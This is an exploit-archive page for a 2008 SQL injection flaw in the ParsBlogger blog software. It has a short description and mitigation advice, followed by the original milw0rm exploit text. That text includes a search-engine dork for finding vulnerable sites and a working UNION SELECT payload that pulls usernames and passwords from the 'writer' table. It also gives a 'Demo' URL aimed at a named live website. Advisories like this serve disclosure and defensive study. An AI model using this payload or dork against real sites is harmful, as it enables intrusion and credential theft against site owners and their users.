header-logo
Suggest Exploit
vendor:
ParsBlogger
by:
Hussin X
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: ParsBlogger
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ParsBlogger (links.asp id) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The malicious request contains a specially crafted SQL query that can be used to extract sensitive information from the database. The malicious query is sent as a parameter in the URL, which is then processed by the vulnerable application. The vulnerable application then executes the malicious query, which can be used to extract sensitive information from the database.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries. Additionally, it is recommended to use parameterized queries instead of dynamic SQL queries.
Source

Exploit-DB raw data:

|___________________________________________________|
|
| ParsBlogger  (links.asp id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------    Hussin X  -------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                     |
|
| script : http://www.parsblogger.com/demo.htm
|
| DorK   : "  ParsBlogger  ? 2006. All rights reserved"
|___________________________________________________|

Exploit: 
________



www.[target].com/Script/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer--

Demo

http://www.shahedblog.com/blog/links.asp?id=-6+union+select+1,2,3,4,5,6,7,concat(0x3e,username,password),9+from+writer--

____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
|_____________________________________________________________________


                   Im IRAQi    |    Im TrYaGi

# milw0rm.com [2008-10-13]